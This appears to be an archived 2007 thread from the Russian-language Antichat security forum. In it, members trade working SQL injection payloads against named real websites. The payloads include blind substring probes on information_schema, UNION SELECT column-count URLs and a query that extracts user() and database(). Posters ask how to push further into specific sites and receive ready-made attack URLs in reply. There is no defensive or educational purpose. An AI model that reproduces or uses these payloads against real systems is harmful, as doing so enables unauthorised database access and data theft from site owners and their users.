ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.12.2007, 17:22
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 je0n
объясните что тут. ничего не получается
Если не лень, делай так. Но по моему это будет ОЧЕНЬ долго 
Код:
http://www.e3e5.com/article.php?id=1533+AND+ascii(lower(substring((SELECT+table_name+from+information_schema.tables+LIMIT+1+OFFSET+1),1,1)))=100
Выбрал именно эту таблицу так как других не нашел (вроде бы есть users но столбики не подобрал) |
|
|
13.12.2007, 00:23
|
|
Новичок
Регистрация: 26.08.2007
Сообщений: 9
Провел на форуме:
62847
Репутация:
0
|
|
http://www.vglta.vrn.ru/?rzdl=1
Поиск произведен по запросу: '
SELECT WP_razdel, WP_num, WP_text_ru FROM tbl_pages WHERE MATCH(WP_text_ru) AGAINST(''') ;
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1
|
|
|
|
13.12.2007, 05:16
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
shiky ищи
1')/**/union/**/select/**/1,2,3/*
|
|
|
|
17.12.2007, 17:40
|
|
Новичок
Регистрация: 26.08.2007
Сообщений: 9
Провел на форуме:
62847
Репутация:
0
|
|
2VampiRUS спасиб большое. Значит на сайте 3 таблицы? Вопрос - какой функцией получить имена таблиц/полей?
|
|
|
|
18.12.2007, 01:36
|
|
Новичок
Регистрация: 19.10.2007
Сообщений: 3
Провел на форуме:
227627
Репутация:
1
|
|
Не могу дальше ничего сделать http://litra.ru/s4sused.php?docfile=1796014001924' , подтолкните plz .
|
|
|
|
18.12.2007, 01:48
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
http://litra.ru/s4sused.php?docfile='+union+select+1,2,3,4,5,conca t(user(),0x20,database()),7+/*
|
|
|
|
18.12.2007, 20:06
|
|
Новичок
Регистрация: 26.08.2007
Сообщений: 9
Провел на форуме:
62847
Репутация:
0
|
|
Снова вопрос. ht tp://www.vorstu.ru/search/?text=%AD&sel_rubric%5B%5D='
подскажите, что делать дальше.
пробовал order by-не помогло
|
|
|
|
19.12.2007, 02:21
|
|
Новичок
Регистрация: 19.10.2007
Сообщений: 3
Провел на форуме:
227627
Репутация:
1
|
|
Хз , пробуй http://www.vorstu.ru/search/?text=%AD&sel_rubric%5B%5D='%20UNION%20SELECT%201/*
|
|
|
|
19.12.2007, 02:33
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Вообще вроде так...но принтабельных полей не увидел
Код:
http://www.vorstu.ru/search/?text=%AD&sel_rubric%5B%5D=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
|
|
|
|
19.12.2007, 14:10
|
|
Новичок
Регистрация: 26.08.2007
Сообщений: 9
Провел на форуме:
62847
Репутация:
0
|
|
Да. полей не видно.
Вот исчо 1 sql, снова в поиске, снова кавычка...
http://fart.pp.ru/index.php?page=search
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
